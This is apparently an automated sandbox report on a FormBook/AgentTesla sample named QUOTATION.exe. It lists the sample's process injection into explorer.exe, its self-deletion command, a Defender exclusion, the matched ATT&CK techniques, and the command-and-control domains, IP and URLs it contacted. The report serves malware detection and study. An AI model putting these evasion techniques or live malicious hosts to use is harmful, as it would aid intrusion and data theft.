          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Users\user\Desktop\QUOTATION.exe C:\Users\user\Desktop\QUOTATION.exeJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXEJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\QUOTATION.exe"Jump to behavior
          Source: explorer.exe, 00000013.00000000.299565234.0000000000B68000.00000004.00000020.sdmp, explorer.exe, 00000013.00000000.336419113.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000013.00000000.323444529.0000000005E10000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000013.00000000.336798226.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.320364799.00000000011E0000.00000002.00020000.sdmp, explorer.exe, 00000013.00000000.299819955.00000000011E0000.00000002.00020000.sdmp, NETSTAT.EXE, 00000018.00000002.549239748.00000000046B0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000013.00000000.344152528.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.309030845.0000000008778000.00000004.00000001.sdmp, explorer.exe, 00000013.00000000.328622205.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Users\user\Desktop\QUOTATION.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Scheduled Task/Job1Process Injection512Disable or Modify Tools11Credential API Hooking1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information4Security Account ManagerSystem Information Discovery112SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSSecurity Software Discovery321Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsVirtualization/Sandbox Evasion31VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading1DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion31Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection512/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532906 Sample: QUOTATION.exe Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 45 www.archedbeautynw.com 2->45 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for URL or domain 2->55 57 11 other signatures 2->57 10 QUOTATION.exe 7 2->10         started        signatures3 process4 file5 39 C:\Users\user\AppData\...\lQdAGavApIJoo.exe, PE32 10->39 dropped 41 C:\Users\user\AppData\Local\...\tmp8E88.tmp, XML 10->41 dropped 43 C:\Users\user\AppData\...\QUOTATION.exe.log, ASCII 10->43 dropped 69 Uses schtasks.exe or at.exe to add and modify task schedules 10->69 71 Uses netstat to query active network connections and open ports 10->71 73 Adds a directory exclusion to Windows Defender 10->73 75 Tries to detect virtualization through RDTSC time measurements 10->75 14 QUOTATION.exe 10->14         started        17 powershell.exe 24 10->17         started        19 schtasks.exe 1 10->19         started        21 QUOTATION.exe 10->21         started        signatures6 process7 signatures8 77 Modifies the context of a thread in another process (thread injection) 14->77 79 Maps a DLL or memory area into another process 14->79 81 Sample uses process hollowing technique 14->81 83 Queues an APC in another process (thread injection) 14->83 23 NETSTAT.EXE 14->23         started        26 explorer.exe 14->26 injected 29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        process9 dnsIp10 59 Self deletion via cmd delete 23->59 61 Modifies the context of a thread in another process (thread injection) 23->61 63 Maps a DLL or memory area into another process 23->63 65 Tries to detect virtualization through RDTSC time measurements 23->65 33 cmd.exe 1 23->33         started        47 purelai.store 208.51.62.42, 49786, 80 NETRANGEUS United States 26->47 49 www.purelai.store 26->49 67 System process connects to network (likely due to code injection or exploit) 26->67 35 autoconv.exe 26->35         started        signatures11 process12 process13 37 conhost.exe 33->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QUOTATION.exe40%VirustotalBrowse
          QUOTATION.exe18%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe18%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          17.0.QUOTATION.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.QUOTATION.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.2.QUOTATION.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          17.0.QUOTATION.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          purelai.store2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX100%Avira URL Cloudmalware
          www.purelai.store/p2r0/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          purelai.store
          		208.51.62.42
          		truetrueunknown
          www.archedbeautynw.com
          		192.185.0.218
          		truefalse
            		unknown
            www.purelai.store
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnXtrue
              • Avira URL Cloud: malware
              		unknown
              www.purelai.store/p2r0/true
              • Avira URL Cloud: malware
              		low

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1LNETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameQUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpfalse
                  		high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  208.51.62.42
                  		purelai.storeUnited States
                  		17139NETRANGEUStrue

                  General Information

                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:532906
                  Start date:02.12.2021
                  Start time:19:53:41
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 10m 40s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:QUOTATION.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:36
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@17/8@2/1
                  EGA Information:Failed
                  HDC Information:
                  • Successful, ratio: 18.4% (good quality ratio 16.4%)
                  • Quality average: 72.9%
                  • Quality standard deviation: 31.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 84
                  • Number of non-executed functions: 169
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  Warnings:
                  Show All
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  19:54:32API Interceptor1x Sleep call for process: QUOTATION.exe modified
                  19:54:36API Interceptor40x Sleep call for process: powershell.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  NETRANGEUSz0x3n.x86-20211110-2150Get hashmaliciousBrowse
                  • 173.247.233.114
                  https://bootsonagmvhhy.storage.googleapis.com/bootsizitvhjeo.html#qs=r-abacaecgjgkeacaefbicababacagbacfcaccakjbackbfahebejacbGet hashmaliciousBrowse
                  • 208.51.63.170

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION.exe.log
                  Process:C:\Users\user\Desktop\QUOTATION.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):1310
                  Entropy (8bit):5.345651901398759
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
                  MD5:D918C6A765EDB90D2A227FE23A3FEC98
                  SHA1:8BA802AD8D740F114783F0DADC407CBFD2A209B3
                  SHA-256:AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
                  SHA-512:A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
                  Malicious:true
                  Reputation:moderate, very likely benign file
